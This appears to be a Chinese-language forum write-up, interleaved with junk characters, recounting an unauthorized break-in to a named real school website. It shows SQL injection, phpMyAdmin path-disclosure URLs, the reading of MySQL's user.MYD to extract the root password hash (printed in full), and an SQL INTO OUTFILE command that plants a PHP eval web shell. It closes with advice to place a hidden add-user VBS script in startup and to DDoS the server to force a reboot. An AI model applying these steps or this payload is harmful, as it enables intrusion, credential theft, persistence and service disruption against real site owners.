第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏6 R" A/ x& V) W( u( d$ S& ?# }% p7 ^
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
, k* S6 u# O/ ?- _0 a
/ {* F/ x: Q, @. I9 k# [
* d! @# A$ h7 j9 ~; `+ I
+ Z. H, N& `- D. H* k" i常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 5 ]: \7 _& @1 f) v8 e4 @6 J
" L/ ~7 R/ R) f: Z那么想可以直接写入shell ,getshell有几个条件:
" Q* I5 l& a- J9 l3 l2 Q" X1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
3 a) D8 q4 M u& Y8 ^$ m; _
5 \( |) G' A8 t- o3 K! G试着爆绝对路径: , V* ^8 k) R- T x9 \8 H7 d' J
1./phpMyAdmin/index.php?lang[]=1 ] g* z2 K& o- X" K) F
2./phpMyAdmin/phpinfo.php # \ o, d6 Q- ~& `/ u
3./load_file()
. k7 r2 m4 @8 u4./phpmyadmin/themes/darkblue_orange/layout.inc.php ' H+ D* ]6 F( B' j1 `/ T; j
5./phpmyadmin/libraries/select_lang.lib.php
- H4 F6 Y Z# F; @1 D6./phpmyadmin/libraries/lect_lang.lib.php
! g% D+ m+ n6 H) b* p1 m' Y7 x J& K7./phpmyadmin/libraries/mcrypt.lib.php
( K+ t7 L) ~) n V7 S& n8./phpmyadmin/libraries/export/xls.php $ L9 L. H; h# ~/ e" L9 }5 N
+ w' G+ t/ {: w4 `% |均不行........................... ' o( N0 b( m5 Y5 D5 m
$ F7 q, C6 W: J" f, F( e" K% i
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
. Z; e; R- C* [ j1 V/ J
3 n. V/ x1 o% T权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# `% m' R6 B/ e$ K7 V, t' N' \
$ l- u, P8 d: o; ?' N* G S( A默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 # t5 e% C% v X, q& q" E
, r, U4 Q8 ~4 z* n/ e; c
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 5 G! I4 {' x( ^3 U* K( L2 q* I! T
0 c" L/ P j) ]9 \( }8 S1 j p8 ^
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 2 I8 I- m N8 M
3 N% Q' Q# F( k$ }9 b# ihttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
( \0 d: \) ~ T- V; }. w) v4 {
* v4 F' [$ y6 W z t8 `: {自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 }7 j! x: w% P% V. p
) U% o6 B5 S' Z m9 s
成功读到root密码:
9 @. w/ {6 s5 F3 A3 b: I8 Q3 z6 J8 {4 W4 l8 {& \
17---- r(0072)
, c8 H; X6 E' |* h7 @18---- o(006f)
9 q/ r0 v" Z# _$ n* P5 |; ~' L19---- o(006f)
a" i H+ k# c! c3 ]20---- t(0074)
& m+ q) h% @! N- X21---- *(002a) ) y* m. G, a+ p: g( N U" {
22---- 8(0038)
6 P/ u' ]/ g4 V+ C1 f0 j23---- 2(0032) " @% Y) H( @$ [! ~# p
24---- E(0045)
5 P |2 d8 S! O25---- 1(0031) ; l9 e- d9 K! n1 g0 \% L! x7 h
26---- C(0043) 0 J3 Z' P( ?- F: R5 c7 Q9 j
27---- 5(0035) - q! Z4 R" Q8 A/ j9 t
28---- 8(0038)
2 x1 e4 B3 Z* _" y! |( G) b29---- 2(0032) ( q7 N- g$ x' t/ r5 q; a
30---- 8(0038) C8 w; A" `' S& ^! G0 I' {. _+ Y/ E
31---- A(0041) 9 Y* Q& a3 W d/ a. K' O, v) h
32---- 9(0039) T, }4 J, L3 B# n; w
33---- B(0042)
, Z6 X, [' t* I- l8 `8 L1 w5 _, u34---- 5(0035) - h `$ v6 w" x9 m
35---- 4(0034)
2 ?. | L" t; J36---- 8(0038) 9 H, p4 Q* q3 q ^7 B& `
37---- 6(0036) ' r4 T& \, O# k
38---- 4(0034)
4 ^$ r! I8 ~3 s6 x" W6 u. r" Z; v39---- 9(0039) 3 F1 K& x n1 I9 ~8 W1 P' c+ h( d
40---- 1(0031) 0 ?& R; J9 ?1 x% x. h S1 y7 m
41---- 1(0031) ; N6 b$ q+ f/ a9 X+ M7 N! i4 h! W
42---- 5(0035)
0 v# k% ]+ |" n H43---- 3(0033)
/ J' @8 S& O2 o: p44---- 5(0035) , [7 Z0 A2 j5 P9 E8 b
45---- 9(0039)
$ y: t( R3 X m: D; f9 E/ L46---- 8(0038) ' _5 ^. U Q/ `1 U7 X+ W
47---- F(0046)
1 J9 y& Y" Y3 x: v' M" w48---- F(0046)
' f$ n. w1 q5 o6 [; O49---- 4(0034) 0 [) z! q# u3 Q4 {1 G0 _# b+ o3 }
50---- F(0046)
% p' A" x2 l3 q- `$ n51---- 0(0030)
8 m# O& C: {2 j W" b# O, {52---- 3(0033) " w* W, K$ p, n* t8 ^% A5 X
53---- 2(0032)
# h! s$ Z! g4 J& _) _54---- A(0041)
7 T% M6 N( O; M' I) j: d2 g55---- 4(0034)
; c7 x) B* ]' X. G' P9 k56---- A(0041)
! n! J8 [5 K3 U& }2 o! j& q57---- B(0042)
4 i' l% N' ]" k! g0 P% d58---- *(0044) * h+ b: ]. Z4 `* ~ o3 m* p
59---- *(0035)
4 s) Z" r, q; y, I60---- *(0041)
- N" R, s% ^, F9 Y61---- *0032) 5 Y7 K3 _- Q( W
4 b' [9 I/ D8 {6 \# A2 S& K解密后成功登陆phpmyamin " Z* t0 h6 ~8 a, O! j
/ Z8 {, x5 D/ d
6 ]" H5 P, r( B* p |
8 O m6 t. l* a' _; {4 \$ h1 l/ h$ D5 z" i. ]' m$ w
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 ^. c A9 @, V2 w
5 p" o1 L5 Z4 O6 f7 \成功执行,拿下shell,菜刀连接: 8 Z. r0 l2 ^5 U a! n
; Y5 g+ r4 [: Y& i3 o$ H
服务器不支持asp,aspx,php提权无果...................
K( }9 K; @" M8 K6 c9 U% R
: N9 Y% k4 q; I+ {" v但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ; K# e+ d( B6 C) q
服务器上已经有个隐藏帐号了
) L+ c8 f8 P& V0 `7 z) c) B别名 administrators
0 U% G7 F9 c9 \; a# S注释 管理员对计算机/域有不受限制的完全访问权 : [ D' F' |) C2 V4 p* l. ^
成员
+ R! C% h8 G6 y, ~0 k1 D-------------------------------------------------------------------------------0 u5 w) A( D8 f5 i. T8 M
admin
' n5 U1 U; Z0 C" |, k( cAdministrator
2 y) s" k8 f! c1 u, Sslipper$
' [7 H% ?* l" B' H: Dsqluser
* ?+ F* w4 M4 h6 L8 }* v) @命令成功完成。
4 y' g8 o3 [; J8 g+ C) K) U- E: s! g( U5 [- _& h# l
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
. O) `; ]) j" L* {6 m8 D* m0 z Z: @' ^% U) [
ddos服务器重启,不然就只能坐等服务器重启了...............................
) @& d- e, A" s. t# A* y0 u# t4 A" I1 t: y% H' u& c! _& W
$ u% {# R' v5 e1 t2 A
|